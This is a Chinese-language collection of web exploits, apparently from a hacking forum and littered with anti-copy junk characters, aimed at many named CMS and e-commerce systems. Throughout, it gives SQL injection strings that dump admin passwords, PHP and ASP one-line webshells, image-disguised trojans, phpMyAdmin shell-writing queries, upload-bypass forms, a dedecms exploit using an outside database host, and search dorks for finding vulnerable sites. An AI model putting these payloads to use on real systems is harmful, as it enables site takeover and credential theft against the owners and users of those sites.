启航企业建站系统 cookie注入漏洞通杀所有版本$ [. f8 u! G- ?. _8 v, F8 M# {* H
1 U/ }7 v! {- p9 W' z0 U5 S1 V
直接上exploit:/ ?- K& l; Q* `$ z
javascript:alert(document.cookie="id="+escape("1 and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin"));
/ A: W* t! f; Vtest:http://www.tb11.net/system/xitong/shownews.asp?id=210
! w$ B* {+ `4 I% P- s--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
, h! z: a$ z/ g$ G, s- W- dAsprain论坛 注册用户 上传图片就可拿到webshell
# u6 W6 x7 j8 N1 V) t N
; X! h6 L" p" _( _% u4 M3 nAsprain是一个适合于各中小学、中专、技校、职高建设校园论坛、师生交流论坛,一些教科研部门、公司企业建设内部论坛、IT技术爱好者建设技术交流论坛的免费论坛程序。+ b1 B6 d0 n! M2 V' R& p. D+ I* v
1.txt存放你的一句话马 如:<%execute(request("cmd"))%>
1 |8 ^- w6 f; t# P, x# I8 b! f2.gif 为一小图片文件,一定要小,比如qq表情图片1 I5 C; N1 C9 C; I: k4 N3 O9 T
3:copy /b 2.gif+1.txt 3.gif 这样就伪造了文件头,但是现在传上去还不行,我接下来就用
1 r: Q! k6 r c/ |4:copy /b 3.gif+2.gif 4.asp ok,现在文件头和文件尾都是正常的图片文件了
a, Y7 L0 M' y5 i, T5.q.asp;.gif
# H$ v1 O( p0 n ygoogle:Powered by Asprain
( {: m- R( s) V--------------------------------------------------------------------------------------------------------------------------------------------------------------------------' } s0 X# o4 R7 V- o2 K4 j+ @
. ]/ q9 k4 d+ w, W B# V* l- e1 q
ShopNum1全部系统存在上传漏洞。
$ S! {7 ]5 u& ]6 h5 W0 ?/ I7 M! z
6 B+ D, w* _3 ?& a首先 在 http://www.shopnum1.com/product.html 页面查看任意产品详细说明。
2 Y- P3 a" Q! c% ^/ [按说明 提示登录后台。。# C7 d2 o& u: i1 n+ ?$ L
在后台功能页面->附件管理->附件列表4 S0 O; t% I* R% M& f
可以直接上传.aspx 后缀木马 Z' S4 Y9 s, ^+ d- B
http://demo.shopnum1.com/upload/20110720083822500.aspx
! C1 a3 S% H5 O* p- e* V4 |) |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------0 [$ d) Z2 V" A' S& `0 A4 t
3 ^* L, ~! W) b! z" I3 u
牛牛CMS中小企业网站管理系统 上传漏洞
# Q) [# k) Q0 w9 A7 ^/ l- {. t
; i) Z7 v. @6 T牛牛CMS是中企商铺网专为中小企业网站开发的网站管理系统。% g/ m0 k# p$ N! u5 R. @: ]4 ?
后台:admin/login.asp
. D' f% ]5 D7 U4 z2 c6 B' bewebeditor 5.5 Nday
$ X, Q I6 g7 C: n# U/ t' q. jexp:
( g) A- R. A5 P4 S<form?action="http://www.lz5188.net/Admin/WebEditor168/asp/upload.asp?action=save&type=image&style=popup&cusdir=Mr.DzY.asp"?method=post?name=myform?enctype="multipart/form-data">? Q9 [, I( q+ a- P8 f7 @
<input?type=file?name=uploadfile?size=100><br><br>?7 K7 N8 R6 R) k& b
<input?type=submit?value=upload>?: L* a# \# |5 S+ r. \7 }
</form>7 o/ U2 }2 L$ g/ U$ ^" u
ps:先上传小马.4 j8 Y% d) X5 m/ e8 k! m8 Z9 n( d
inurl:member/Register.asp 您好,欢迎来到立即注册立即登录设为首页加入收藏0 Y' T2 `; ~; ?% y; D; [9 g6 c
* r" W3 _# a- M, i3 B# A1 [
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------& x4 h: g, A3 ]( c
' Y0 m) R3 G$ d$ h
YothCMS 遍历目录漏洞: J+ L3 w/ c6 j& T
+ u$ V) _1 X0 n6 ^! C' \# n0 {
优斯科技企业网站管理系统(YothCMS)是一款完全开源免费的CMS。
. E8 I$ I, N" e8 M默认后台:admin/login.asp9 O/ F, E9 ]/ \, E) ]1 S
遍历目录:
. L, D' p* \4 y0 ~# l. c; B8 @/ h( ~7 }ewebeditor/manage/upload.asp?id=1&dir=../
9 i% k3 p" t4 @& H$ R0 {: e' k& Gdata:- T- s+ N# W* `! k2 y# k! d
http://www.flycn.net/%23da%23ta%23\%23db_%23data%23%23.asa% s/ ]. [5 P% d: [
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
2 Z2 h# q: u$ x: `, y
p+ v' J: O$ P: BNet112企业建站系统 1.0
$ s& m) t* ?# I A3 j/ z" \( w9 E* U0 P3 p4 V
源码简介:- ^) m2 U7 c" s0 C- \% S
Net112企业建站系统,共有:新闻模块,产品模块,案例模块,下载模块,相册模块,招聘模块,自定义模块,友情链接模块 八大模块。
1 K) G+ l- m+ u* X, P5 u, }添加管理员:" q$ i5 T! V' v- W* V) _
http://www.0855.tv/admin/admin.asp?action=add&level=2
4 @7 h1 ]3 f6 |, A' p: s其实加不加都不是很重要,后台文件都没怎么作验证。
6 K7 p: N! e2 x! K1 Z上传路径:5 ]1 g1 ?7 }# q
http://www.0855.tv/inc/Upfile.as ... 0&ImgHeight=200
! L y. X3 |* Y0 Whttp://www.0855.tv/inc/Upfile.asp?Stype=2
& c% s! k% W7 Q% X/ ?怎么利用自己研究。
' b, i/ m" O) w; t& O; z遍历目录:
: Y# e: Y" R* S/ d/ K7 dhttp://www.0855.tv/admin/upfile.asp?path=../..
0 L0 @* S j5 \: r% T如:
/ T. _0 t n( ]0 n+ ehttp://www.0855.tv/admin/upfile.asp?path=../admin
" d6 g0 j8 n+ J5 t0 j, K' t0 L; p( fhttp://www.0855.tv/admin/upfile.asp?path=../data
4 R1 P) I; ?7 z$ T--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
* I' t A6 M. ^0 z% H+ U& H/ Y L
! N) j" v- l( {: W c- R, \5 u. f6 T易和阳光购物商城通杀 上传漏洞
- v. _4 l' \) p) b. B- m5 F) e) U) u- S& V9 t6 Q
前提要求是IIS6.0+asp坏境。8 Y! \, Z8 P* t( S& Z1 ]
漏洞文件Iheeo_upfile.asp
% F. _( e2 ]( s; @. B' z( j7 ~过滤不严.直接可以iis6.0上传1 ~3 ]# n" r( |/ M
把ASP木马改成0855.asp;1.gif
, X8 s# E7 k8 X( Z2 O0 `8 F直接放到明小子上传 p+ g H" s2 ?2 j2 Q/ T
Google搜索:inurl:product.asp?Iheeoid=
9 i3 \" ]& d2 o# i--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
6 Y- n* h' ?4 M7 q' ~# }2 I+ r/ _( B5 X' k5 K1 ]; b* D- A6 Y" P
phpmyadmin后台4种拿shell方法
7 A. M6 e; g, f' [, t
* f, j' b4 V, G Q y4 R7 s% Q方法一:
2 {& W% E% N. I( v8 L9 m6 P" N( `CREATE TABLE `mysql`.`xiaoma` (`xiaoma1` TEXT NOT NULL );
- |; L, g* ^0 T+ P0 jINSERT INTO `mysql`.`xiaoma` (`xiaoma1` )VALUES ('<?php @eval($_POST[xiaoma])?>');! O$ b$ E0 H$ j3 e1 U; p
SELECT xiaomaFROM study INTO OUTFILE 'E:/wamp/www/7.php';
3 {4 X Q: U7 `+ I' k----以上同时执行,在数据库: mysql 下创建一个表名为:xiaoma,字段为xiaoma1,导出到E:/wamp/www/7.php
5 x8 y" [$ z0 V- |1 X" L5 D9 x. q一句话连接密码:xiaoma
( ]$ E/ f4 n: U* G. v& B7 a9 W方法二:( f8 ?& z$ p: }- T
Create TABLE xiaoma (xiaoma1 text NOT NULL);0 L: T8 H- _( J% P5 [8 K m
Insert INTO xiaoma (xiaoma1) VALUES('<?php eval($_POST[xiaoma])?>');: K/ [! |3 w! e) v z
select xiaoma1 from xiaoma into outfile 'E:/wamp/www/7.php';1 K: `/ D- X2 I: f& l
Drop TABLE IF EXISTS xiaoma;# a) T; u' Q# b* R: y& v
方法三:/ X6 X* O4 O( @) v0 |
读取文件内容: select load_file('E:/xamp/www/s.php');6 ^7 W2 y0 C( V b9 M1 x
写一句话:select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/xiaoma.php'
) J% c- f7 \, p5 T! p' O2 n0 Pcmd执行权限:select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'
( ~& |% v- F' V! C3 `方法四:
, Y8 R. W4 E9 ]; |# x6 S4 Pselect load_file('E:/xamp/www/xiaoma.php');
) ~% p d; g' {" d1 vselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/xiaoma.php'6 w y% g) G6 z* a, t
然后访问网站目录:http://www.xxxx.com/xiaoma.php?cmd=dir
) q" v; M- Y$ ]! |--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
. c3 C: I" s; y/ S+ u3 x
5 W* n" ~$ w4 g& z* W `传信网络独立开发网站源码0day漏洞
5 c; T% E" r" ] l# W+ b w8 a/ [) z; G& C- C: c( m" v, C
后台system/login.asp, z5 n- n3 q' D6 a: L! J! v% M
进了后台有个ewebeditor
# z# f) y6 H& b9 A* |Google 搜索inurl:product1.asp?tyc=
( E" h U* W6 `1 ^编辑器漏洞默认后台ubbcode/admin_login.asp
: S7 e" M: g4 v( v1 }) D5 M5 q数据库ubbcode/db/ewebeditor.mdb
5 [7 P: G/ Y# \6 X" D. n' [9 _7 L2 ^ o默认账号密码yzm 111111% L; Z7 W; X$ j0 t# y! _
% c% H+ [) w' @4 q( @
拿webshell方法$ p4 w% m d1 _: I
登陆后台点击“样式管理”-选择新增样式
: X! C4 X8 |* B& A样式名称:scriptkiddies 随便写 9 f m! W2 m& X: k* \; S8 i6 u" G
路径模式:选择绝对路径
) m D' Z8 e2 a+ j; a图片类型:gif|jpg|jpeg|bmpasp|asa|aaspsp|cer|cdx
% ]2 g# O; k+ n图片类型比如就是我们要上传的ASP木马格式) B6 f/ ~& _# _' @, H
上传路径:/
7 i+ ^* D( h5 C& X图片限制:写上1000 免的上不了我们的asp木马
, J; K. A# d4 ~, I上传内容不要写
0 ?8 {. j; V$ s1 s( V2 r: p可以提交了 5 d, O5 M1 [% @
样式增加成功!
% j* A% E& R2 R, u6 r" ]3 y返回样式管理 找到刚才添加的样式名称 然后按工具栏 在按新增工具栏
3 Q# C% k( L2 ~' A8 v6 U按钮设置 在可选按钮 选择插入图片然后按》 -然后保存设置
- j) a3 c& y; V! s4 ^, u7 Y$ B' D网页地址栏直接输入ubbcode/Upload.asp?action=save&type=&style=scriptkiddies& @# N/ L' h4 E8 ~ F0 U
上ASP木马 回车 等到路径
% @- J3 o* r1 {
f! _& `2 ^' Z7 ]后台:system/login.asp- J6 p& s5 z5 E* a
Exp:6 }0 I" ]0 F J( i; q$ q" R
and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master% `, j5 V+ x, B9 L' V$ s
测试:
& w+ L( D8 P( B, _$ E |http://www.zjgaoneng.com/product_show.asp?id=9 and 1=2 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14,15 from master4 T2 O& s7 o8 r2 s( X5 W
http://www.yaerli.com/product_show.asp?id=245 union select 1,userid,3,4,5,6,7,8,userpwd,10,11,12,13,14 from master
" {# ^. Z. @% s2 C+ N--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
% p7 k3 ^# [. d F4 K, d$ E4 l) @0 V9 l( i/ x
foosun 0day 最新注入漏洞
5 I) I% d; `4 H; K
& V, c# J. l" i# u, R \漏洞文件:www.xxx.com/user/SetNextOptions.asp" \+ _/ z( L% F' d: Y9 i* {& [
利用简单的方法:
; G- z+ Z/ U5 } S* g暴管理员帐号:, a2 ]; ]# ?7 d s3 q4 \
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_name,3,4,5,6,7,8++from+FS_MF_Admin
" p7 T5 f5 D* b( p/ I f6 Q暴管理员密码:/ \! @+ R8 j/ \. H X1 ~
http://www.i0day.com/user/SetNex ... amp;ReqSql=select+1,admin_pass_word,$ s$ q0 \# L6 t5 m% n9 Q6 @
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
C/ @3 ~& K+ C! k9 N/ X
" p. ^& i: L3 W9 D3 o! D% _- o网站程序的版权未知!) `; m$ U0 O- q) Q7 D( _
- H/ f8 E' z" w7 _3 E默认网站数据库:$ w) a( k3 r$ B
www.i0day.com/data/nxnews.mdb1 B, Q8 i% g& H+ [) ~0 q. M1 R8 a
ewebeditor 在线编辑器:
8 M8 P3 S$ d" }4 Q6 [4 b% H编辑器数据库下载地址:www.i0day.com/ewebeditor/db/ewebeditor.mdb2 {& S$ e/ x a6 O" x A
登录地址:ewebeditor/admin_login.asp
" M- d! N. d+ k默认密码:admin admin0 F6 L- `5 _/ L/ d/ Q# z
登陆后可遍历目录:ewebedtior/admin_uploadfile.asp?id=22&dir=../../data
- h; L$ R) Q4 [9 a; i* V1 B+ ~8 l, @" G% Z3 o
Sql注入漏洞:
! V% i3 q. G) h/ mhttp://www.i0day.com/detail.asp?id=12, {7 h7 p) G7 f, F
exp:
Q. Q7 \' _) G$ munion select 1,admin,password,4,5,6,7,8 from admin
/ ?* D( m% c* Q5 T/ F" Y爆出明文帐号/密码7 ^! y0 |; f- G0 u
( b! H. c" \ l$ c7 p' B; ~上传漏洞:( I4 ~3 F2 h0 x5 r, W+ ?* H) K
后台+upfile.asp2 S" `7 } x6 L4 T8 @! ~: c
如:
! ]7 ~! o) g7 g/ W9 A4 ~: dhttp://www.i0day.com/manage/upfile.asp 可以用工具。如明小子。
2 U4 p7 Y+ _/ f. w5 rshell的地址:网址+后台+成功上传的马* N8 {5 A$ _; e) J# n0 Y
google:inurl:news.asp?lanmuName=6 [, @; _6 C/ b/ L5 C3 C% _3 }2 }
------------------------------------------------------------------------------------------------------------------------------------------------------------------------1 h: u. N- y* p$ h R& ]7 m
Q6 H/ m( j$ c
dedecms最新0day利用不进后台直接拿WEBSHELL
3 Y% N1 l0 e) k/ u# e- R! z; i* m
& n/ O1 S1 j( k" u& o拿webshell的方法如下:1 f# W, g$ r8 A) v* J5 e" S# t
网传的都是说要知道后台才能利用,但不用,只要 plus 目录存在,服务器能外连,就能拿shell.. w4 ?! [. w0 I9 X/ I
前题条件,必须准备好自己的dede数据库,然后插入数据:+ \% ?4 r1 ]: G P' |: \
insert into dede_mytag(aid,normbody) values(1,'{dede:php}$fp = @fopen("1.php", \'a\');@fwrite($fp, \'\');echo "OK";@fclose($fp);{/dede:php}'); m \) \- @; Q& G3 b8 d8 {
! l; G" ~% c2 ^$ g
再用下面表单提交,shell 就在同目录下 1.php。原理自己研究。。。* I7 v6 W, S& W* J
<form action="" method="post" name="QuickSearch" id="QuickSearch" onsubmit="addaction();">
, ^& `1 L3 Y5 y! O" R# {5 k<input type="text" value="http://www.tmdsb.com/plus/mytag_js.php?aid=1" name="doaction" style="width:400"><br />
# W1 h$ }3 R: C1 k- J# |<input type="text" value="dbhost" name="_COOKIE[GLOBALS][cfg_dbhost]" style="width:400"><br />
& {/ \" X+ I0 X- j<input type="text" value="dbuser" name="_COOKIE[GLOBALS][cfg_dbuser]" style="width:400"><br />( i% d, F3 z, G
<input type="text" value="dbpwd" name="_COOKIE[GLOBALS][cfg_dbpwd]" style="width:400"><br />
$ O3 q3 U4 w n* _. q! `<input type="text" value="dbname" name="_COOKIE[GLOBALS][cfg_dbname]" style="width:400"><br />
: W( R k% j& v<input type="text" value="dede_" name="_COOKIE[GLOBALS][cfg_dbprefix]" style="width:400"><br />
1 J5 S' q' a+ w+ p; U% C) L1 l7 }0 c<input type="text" value="true" name="nocache" style="width:400">; N4 o1 a( S' [$ x t, K
<input type="submit" value="提交" name="QuickSearchBtn"><br />9 Y* E+ ]1 e* A" `5 n1 n4 V% o
</form>
: U$ J4 X) O. h6 i<script>- c/ ?) T! Y# Z8 G( }0 [! p9 }
function addaction()
5 N+ W2 U! J8 c$ V6 E& E. P{/ k5 L; R; t$ f: n
document.QuickSearch.action=document.QuickSearch.doaction.value;
% \6 C4 A2 U, R1 u}$ q0 z3 G7 t4 s5 H
</script>( O: N! ~5 C7 w: G' W
-----------------------------------------------------------------------------------------------------------------------------------------------# b% M r8 w4 u! v! }; i$ Y7 H
$ V: ~! H1 n8 G! a0 j0 U# Udedecms织梦暴最新严重0day漏洞5 y+ _& n' o: S* U
bug被利用步骤如下:! T4 h0 a; o5 W- f9 X' x
http://www.2cto.com /网站后台/login.php?dopost=login&validate={dcug}&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=116.255.183.90&_POST[GLOBALS][cfg_dbuser]=root&_POST[GLOBALS][cfg_dbpwd]=r0t0&_POST[GLOBALS][cfg_dbname]=root: v, L9 k. Z# d) @
把上面{}上的字母改为当前的验证码,即可直接进入网站后台。) O8 n; }$ k" ?; o: b9 u7 m
-------------------------------------------------------------------------------------------------------------------------------------------# y6 I0 ]& R1 V( J p& @
& U. y3 n3 r0 T) X j多多淘宝客程序上传漏洞
$ [3 ^7 v1 L" q6 c; m/ S9 M8 M" q漏洞页面:
3 v! i0 \; d5 Q8 wadmin\upload_pic.php
6 h: t( a( c" M+ d6 N传送门:
! b2 b) o. j' c; V/ K' M! b* ohttp://www.www.com/admin/upload_pic.php?uploadtext=slide1( y/ m6 h8 k6 E6 L) u& d1 f
PS:copy张图片马 直接 xxx.php 上传抓包地址!
- y; g1 Z. i( K* y! D+ k6 Y------------------------------------------------------------------------------------------------------------------------------------------------------
: i! s/ X3 b2 a' Y5 z' [8 A7 G5 ]- A0 }
, M) y5 b! F2 j! g1 z7 B无忧公司系统ASP专业版后台上传漏洞
8 Q! C& K( D% C- t' p漏洞文件 后台上传
, C- y; B/ t4 C& ~admin/uploadPic.asp Q' s& `4 g( S4 s
漏洞利用 这个漏洞好像是雷池的: ~& D( h/ }2 v$ H- G- E
http://forum.huc08.com/admin/upl ... ptkiddies.asp;& upload_code=ok&editImageNum=14 D9 C; V4 b( S' h/ s! [
等到的webshell路径:
. z4 Q8 Z. ~# H! z: s4 I8 V8 z/UploadFiles/scriptkiddies.asp;_2.gif- O& C- C5 M1 ?. Y* G7 b+ q
--------------------------------------------------------------------------------------------------------------------------------------------------- m' _' ^. e: c- M0 b
8 Z* B- z* k+ D7 D) ]$ m# s
住哪酒店分销联盟系统2010/ P; j" @3 U, L' r; k# ~ I
Search:
0 u. ?0 w" O H) Q, x: Einurl:index.php?m=hotelinfo% L) ]4 X; \. v' Q( R [, L
http://forum.huc08.com /index.php?m=liansuohotel&cityid=53%20and%201=2%20union%20select%201,concat(username,0x3a,password),3,4,5,6,7,8,9,10%20from%20zhuna_admin
7 @6 K9 z8 c9 K+ `$ `" R3 f. k6 c4 m默认后台:index.php?m=admin/login
" h4 K* O- x* Z( ~$ y6 u--------------------------------------------------------------------------------------------------------------------------------------------------4 p4 b" i1 i3 M) ]0 c
; N( g% v& x4 M5 t+ c0 V3 Einurl:info_Print.asp?ArticleID=
; C' P6 K) g4 j/ c后台 ad_login.asp
" E8 J+ y6 w. \4 t, o4 j爆管理员密码:! q8 f ~) F" e9 Q1 x: \9 u1 k
union select 1,2,username,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28 from admin3 i- P, J! p! n# N" f) c/ G
------------------------------------------------------------------------------------------------------------------------------------------------------------
$ d/ Z# r2 i" z2 g" [0 |8 h; o8 l X; i+ X L0 N
搜索框漏洞!$ e9 N& n2 i+ S
%' and 1=2 union select 1,admin,3,4,5,6,password,8,9,10 from admin where '%'='
! S0 U& R& E R/ s/ u--------------------------------------------------------------------------------------------------------------------------------------------------------$ I& M E% s' H. Z1 [5 x5 W: N
( T- {+ \+ _0 c' Z1 Z: }: B& x
关键字:/ ~5 k( x* k4 r d Y- {0 P8 w
inurl:/reg_TemletSel.asp?step=2
" x8 u! ?; }, ?或者 y4 f$ y+ a- r
电子商务自助建站--您理想的助手. P ]- d1 H' [+ N2 }9 m3 A* f# a
-------------------------------------------------------------------------------------------------------------------------------------------------
2 P* l5 }6 F- q5 U) Q' H3 t+ L9 u5 Y
iGiveTest 2.1.0注入漏洞! _, I; W L( R: ?* [
Version: <= 2.1.0
1 M6 ?9 _2 n2 {! `* G* W0 l# Homepage: http://iGiveTest.com/ h+ v$ Q' I3 O6 ?% U+ L) X7 A
谷歌关键字: “Powered by iGiveTest”* n- M/ g ^; C$ E" P
随便注册一个帐号。然后暴管理员帐号和密码' H2 x% I" u5 Z" i! ?& p1 \
http://www.xxxx.com/users.php?ac ... r=-1&userids=-1) union select 1,concat(user_name,0x3a,user_passhash),user_email,user_firstname,user_lastname,6,7 from users,groups where (1- X/ p9 m; q# {) E4 G( I$ S
------------------------------------------------------------------------------------------------------------------------------------------------
7 _5 j6 ]6 C2 k: t3 M
# t+ R6 x- ^* HCKXP网上书店注入漏洞: m, H/ N9 w- b3 T! l6 ^
工具加表:shop_admin 加字段:admin0 _. q8 t) D: @' I
后台:admin/login.asp
9 x$ S5 A. ?+ Q) w% V登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/& o! M3 {. R/ v
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息5 f- K" U( J2 k/ K" S) O7 E& S- d
--------------------------------------------------------------------------------------------------------------------------------------------------------------------------
n4 @4 I6 y4 [+ }( h( w% D. L* H+ q) e9 U" H0 w# n/ v8 D5 U6 p5 r
段富超个人网站系统留言本写马漏洞- d/ l4 v8 E1 i' O& J
源码下载:http://www.mycodes.net/24/2149.htm' B: l( Q4 [. r% B- x
addgbook.asp 提交一句话。" ~; b0 n/ F4 t9 P
连接: http://www.xxxx.tv/date/date3f.asp: k) Z* o% g7 r. m- C
google:为防批量,特略!, n3 K. S. t- d) X7 ~' ~# c
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------
+ Y/ a; k7 b v! f; a- a1 l0 P# X7 ?6 O3 n d. ]" W( T9 [
智有道专业旅游系统v1.0 注入及列目录漏洞# v4 x: \9 X: E0 \" {0 D
默认后台路径:/admin/login.asp
+ y( c r7 J" D: q- s: T7 o默认管理员:admin
. Z" X8 H: A8 `默认密码:123456
5 t+ [; o: Q: s& z. kSQL EXP Tset:
, L/ t8 c* D, a8 q$ ~% j' g# ghttp://www.untnt.com/info/show.asp?id=90 union select 1,userid,3,4,5,userpsw,7,8,9,10,11,12,13,14,15 from admin
$ x1 V8 r% y& D% U+ S------------------------------------------------------------------------------------------------------------------------------------------------------------------------. K( Y7 L# }7 |( p- `7 n) `
8 u( q6 C) z3 a; X' P% k& t4 L2 yewebeditor(PHP) Ver 3.8 本任意文件上传0day
0 `/ M0 S0 A+ S2 ~8 PEXP:0 J1 L6 X D( z/ t% D" O$ y* b
<title>eWebeditoR3.8 for php任意文件上EXP</title>
- F, |5 |! c, T9 F7 Q) k<form action="" method=post enctype="multip3 L1 [( A, w% M4 R
art/form-data"> + H# l$ l1 C2 n3 z5 O, t
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="512000"> 8 I& l1 [+ K9 c6 H! ^8 r
URL:<input type=text name=url value="http://www.untnt.com/ewebeditor/" size=100><br>
5 r" O1 _, O' ]1 Y" m- X) z<INPUT TYPE="hidden" name="aStyle[12]" value="toby57|||gray|||red|||../uploadfile/|||550|||350|||php|||swf|||gif|jpg|jpeg|bmp|||rm|mp3|wav|mid|midi|ra|avi|mpg|mpeg|asf|asx|wma|mov|||gif|jpg|jpeg|bmp|||500|||100|||100|||100|||100|||1|||1|||EDIT|||1|||0|||0|||||||||1|||0|||Office|||1|||zh-cn|||0|||500|||300|||0|||...|||FF0000|||12|||宋体||||||0|||jpg|jpeg|||300|||FFFFFF|||1">
6 A) t8 d$ m( W+ v( i7 Yfile:<input type=file name="uploadfile"><br>
( W" [# m5 t6 n& C7 W: S<input type=button value=submit onclick=fsubmit()> % ^& F4 c$ d6 j- j& F1 c% u
</form><br> 8 U7 @2 h/ K* i4 t0 n& H8 u" y
<script> + Z' E" D( y `' |( |; h
function fsubmit(){ 2 c$ Q) B$ p( [- d
form = document.forms[0];
5 Q) \5 B6 ^. }- W* ~$ _1 w) I$ Eform.action = form.url.value+''php/upload.php?action=save&type=FILE&style=toby57&language=en''; " J% \8 I, H6 F) c* W5 @
alert(form.action);
. X" f" i0 t7 |' ?' P6 k( J/ W+ uform.submit();
# A U% K4 c/ i$ c} - f7 ^4 W+ L! ^+ N6 b# m
</script>
. U4 }9 p+ W( Z- n3 @* G0 i: P; v* [注意修改里面ewebeditor的名称还有路径。
0 q e4 } _. I4 Q2 c: R) H---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
: ]5 B# x9 q/ o8 n0 }8 G9 F% y: c, O0 B1 A3 c9 l6 m
提交’时提示ip被记录 防注入系统的利用
: z) Y9 F0 D) I6 \# n: _网址:http://www.xxx.com/newslist.asp?id=122′+ m4 ~: e" r% _1 `$ h& M. h1 @' }$ ~+ q2 i
提示“你的操作已被记录!”等信息。
1 a& z+ ~) i, i; b6 C& B3 j2 H利用方法:www.xxx.com/sqlin.asp看是否存在,存在提交http://www.xxx.com/newslist.asp?id=122‘excute(request("TNT"))写入一句话。4 u! _0 w, g5 H. F t. V
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
/ D* O8 X W, l4 {# b& u
9 X+ E) B+ M' n7 d4 ^# e西部商务网站管理系统 批量拿shell-0day/ J! }4 q) R# R- \' Q
这站用的是SQL通用防注入程序 V3.0,恩,这东西可不好绕,我记得当初我有写过一个文章 通过提交一句话直接拿shell的..唯一的前提是存储记录ip的数据库必须是.asp或.asa才行..看了下sqlin.mdb
" O# m6 f) {3 D5 r- H$ `* F1:admin_upset.asp 这个文件有个设置上传后缀的地方.. 很简单,它直接禁止了asp,asa.aspx 还有个cer可以利用嘛
/ ~! y) l' C }: f! H2:同样是admin_upset.asp 这个文件不是入库的 他是直接在htmleditor目录生成个config.asp文件...Ok不用多说,插个一句话搞定...注意闭合
6 N0 F# U1 B0 _. y. G3:admin_bakup.asp 备份数据库的..但是得本地构造...调用了filesystemobject 怎么利用就不强调了..IIS的bug大家都懂. ~% c' ]" W# o0 O& X& z
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------
4 y# H! v0 Q( k8 b0 Z- E6 S: X' ~2 O! l, O! R0 ]: l0 m" H3 [
JspRun!6.0 论坛管理后台注入漏洞
/ L) V5 e9 |" a- p9 y# P. E
( F9 \1 Q( [. w& p2 T! B8 ISEBUG-ID:20787 发布时间:2011-04-30 影响版本:! E& M* P0 O' [7 |2 N
JspRun!6.0 $ h5 _6 D0 q( k7 w
漏洞描述:
8 [9 I. R) x2 |1 y/ E4 Q5 Q8 LJspRun!论坛管理后台的export变量没有过滤,直接进入查询语句,导致进行后台,可以操作数据库,获取系统权限。8 h0 p$ H _2 @" f9 P% h4 K% n
在处理后台提交的文件中ForumManageAction.java第1940行- f" a2 v9 j/ T7 \
String export = request.getParameter("export");//直接获取,没有安全过滤
+ I" a; \6 j2 Z) qif(export!=null){2 K" c6 x# S3 _
List> styles=dataBaseService.executeQuery("SELECT s.name, s.templateid, t.name AS tplname, t.directory, t.copyright FROM jrun_styles s LEFT JOIN jrun_templates t ON t.templateid=s.templateid WHERE styleid='"+export+"'");//进入查询语,执行了...6 V/ d5 o5 o. `8 p6 T1 E' i
if(styles==null||styles.size()==0){+ q. Q+ s1 ?( `0 N+ \
<*参考& k7 g- T" O' l. K r. N6 w
nuanfan@gmail.com
; Y2 G6 u4 d7 |% |+ H4 s5 P4 f*> SEBUG安全建议:
4 G) _2 { E0 Z$ @1 t, v# Vwww.jsprun.net9 c! \4 w2 s" ?2 f; |
(1)安全过滤变量export
9 a+ ]: M! M. x. }(2)在查询语句中使用占位符
o" p% L$ M6 o1 i8 ~+ R------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- H U4 a+ d3 m% C- w
+ c3 r, Z) E5 |' z' |% {乌邦图企业网站系统 cookies 注入1 n- b* x" b: ]2 `8 ?- M1 j* F" b
7 R1 l7 U5 k) a1 F- ~. v/ T
程序完整登陆后台:/admin/login.asp0 b) A! b1 r$ [# V8 ^
默认登陆帐号:admin 密码:admin888
3 X: O) {: g' R语句:(前面加个空格)* C; p" j3 c- P- [
and 1=2 union select 1,username,password,4,5,6,7,8,9,10 from admin
" @ e0 n: J \. i, |& [- m8 G或者是16个字段:
. r. y! H- B; O8 F) f- oand 1=2 union select 1,username,password,4,5,6,7,8,9,10,11,12,13,14,15,16 from admin
5 ^/ i7 P, U4 t* g( K7 ?8 p爆不出来自己猜字段。
, _: D2 w1 e9 Q: N注入点:http://www.untnt.com/shownews.asp?=88
* i5 X) ?( ]# b- O0 Agetshell:后台有备份,上传图片小马。备份名:a.asp 访问 xxx.com/databakup/a.asp
y' j! g- q3 c {: ^关键字:4 o0 b) c/ w" a0 v5 j
inurl:shownews?asp.id=
6 v( {8 E! w ]" r" G$ y-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------2 |" ^4 N; p) y9 E9 q% Z6 C5 E+ q" V
+ |; M/ r& s0 D" b6 y( p
CKXP网上书店注入漏洞3 R6 u/ w+ e8 A- s! G X" Y
) m ~" z9 f) } ^
工具加表:shop_admin 加字段:admin
- L# o \: @. M( b3 ~后台:admin/login.asp # m3 P* q. e" ~) {+ h5 K a! m
登陆后访问:admin/editfile.asp?act= 直接写马.也可以直接传马:admin/upfile1.asp?path=/8 x6 r* W" `; u
inurl:book.asp 请使用域名访问本站并不代表我们赞同或者支持读者的观点。我们的立场仅限于传播更多读者感兴趣的信息
" [/ I) T6 k/ O" Z---------------------------------------------------------------------------------------------------------------------------------------------------------------------------4 W0 Q. j; b, S# o
- _& w! _) y1 l& B) N$ uYxShop易想购物商城4.7.1版本任意文件上传漏洞* H+ o+ s9 K7 y
